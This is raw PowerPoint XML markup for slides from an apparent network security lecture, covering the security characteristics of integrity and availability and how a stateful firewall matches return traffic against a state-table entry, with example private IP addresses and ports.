              <a:ext cx="1147714" cy="3964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defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="FFA900"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Integrity</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7176" name="Group 8"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="1752600"/>
            <a:ext cx="2971800" cy="1143000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2971801" cy="1143001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7177" name="AutoShape 9"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="-1" y="0"/>
              <a:ext cx="2971802" cy="114300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56A8B9"/>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pPr>
              <a:endParaRPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7178" name="AutoShape 10"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="435209" y="373285"/>
              <a:ext cx="1497907" cy="3964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defTabSz="914400">
                <a:spcBef>
                  <a:spcPts val="500"/>
                </a:spcBef>
                <a:buClr>
                  <a:srgbClr val="FFA900"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Availability</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7179" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Three Security Characteristics</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7180" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="329184" y="1014984"/>
            <a:ext cx="8476029" cy="4985124"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="290513" indent="-290513" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="73AF44"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The goal of security is to maintain these three </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>characteristics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7181" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4503738" y="6565900"/>
            <a:ext cx="185737" cy="236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584200"/>
            <a:fld id="{45C0DD2F-2FA5-C943-8483-9110803710E7}" type="slidenum">
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr" defTabSz="584200"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4238948869"/>
      </p:ext>
    </p:ext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AutoShape 1"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="0"/>
            <a:ext cx="8623300" cy="114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39688" defTabSz="914400">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>What does the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>stateful firewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> really mean?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12290" name="AutoShape 2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4503738" y="6565900"/>
            <a:ext cx="185737" cy="236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584200"/>
            <a:fld id="{095929F1-7324-B840-B691-051AA5DCA609}" type="slidenum">
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr algn="ctr" defTabSz="584200"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Line 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="1854200"/>
            <a:ext cx="34925" cy="2489200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="77BB41"/>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39688" defTabSz="914400"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
              <a:sym typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12292" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4051300" y="1852613"/>
            <a:ext cx="19050" cy="3873500"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="77BB41"/>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39688" defTabSz="914400"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
              <a:sym typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12293" name="Group 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3586163" y="2949575"/>
            <a:ext cx="1841500" cy="889000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1841501" cy="889001"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12294" name="Picture 6" descr="10436_11_2004_ Giancarlo_WWAC.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41501" cy="889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295" name="AutoShape 7"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="366486" y="218370"/>
              <a:ext cx="1116657" cy="4741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marL="25400" algn="ctr" defTabSz="914400">
                <a:buClr>
                  <a:srgbClr val="FFFFFF"/>
                </a:buClr>
                <a:buFont typeface="Arial" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1800" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>Internet</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12296" name="Picture 8"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37000" y="4203700"/>
            <a:ext cx="965200" cy="774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297" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="87313" y="4343400"/>
            <a:ext cx="3771900" cy="50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39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>10.45.6.23  to 172.19.21.144</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>TCP src port 1024, TCP dst port 80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12298" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4800600" y="4343400"/>
            <a:ext cx="3771900" cy="50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39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>172.19.21.144  to 10.45.6.23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>TCP src port 80, TCP dst port 1024?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12299" name="Group 11"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3908425" y="5414963"/>
            <a:ext cx="1071563" cy="1160462"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1070501" cy="1159499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12300" name="Picture 12"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300" y="0"/>
              <a:ext cx="965201" cy="977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301" name="AutoShape 13"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="860515"/>
              <a:ext cx="1044722" cy="2989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39688" algn="ctr" defTabSz="914400"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>10.45.6.23 </a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12302" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3906838" y="1042988"/>
            <a:ext cx="1296987" cy="788987"/>
            <a:chOff x="0" y="2908"/>
            <a:chExt cx="1297706" cy="788783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12303" name="Picture 15" descr="image.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83690"/>
              <a:ext cx="1206500" cy="508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304" name="AutoShape 16"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5731" y="2908"/>
              <a:ext cx="1291975" cy="2989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39688" algn="ctr" defTabSz="914400"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1">
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                  <a:sym typeface="Arial" charset="0"/>
                </a:rPr>
                <a:t>172.19.21.144</a:t>
              </a:r>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12305" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4749800" y="4978400"/>
            <a:ext cx="9525" cy="862013"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="57150" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="77BB41"/>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39688" defTabSz="914400"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:srgbClr val="424242"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
              <a:sym typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12306" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4902200" y="5105400"/>
            <a:ext cx="4254500" cy="304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39688" algn="ctr" defTabSz="914400"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Yes, we have a corresponding state-table entry!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5874920" y="6506666"/>
            <a:ext cx="2909646" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0"/>
              <a:t>*Originally presented by Roland Dobbins at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0"/>
              <a:t>AusNOG</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334958984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wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1229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iterate type="lt">
                                    <p:tmPct val="100000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12297"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="75"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12297"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="12" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="4400"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="13" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12291"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12291"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="16" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="6400"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="17" presetID="9" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="100000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12298"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="75"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1229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iterate type="lt">
                                    <p:tmPct val="100000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12306"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="75"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12306"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold" nodeType="afterGroup">
                            <p:stCondLst>
                              <p:cond delay="3075"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12305"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12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autoUpdateAnimBg="0"/>
      <p:bldP spid="12292" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="12297" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="12298" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="12305" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="12306"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AutoShape 1"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="0"/>
            <a:ext cx="8623300" cy="114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39688" defTabSz="914400">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>What does the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="424242"/>
                </a:solidFill>
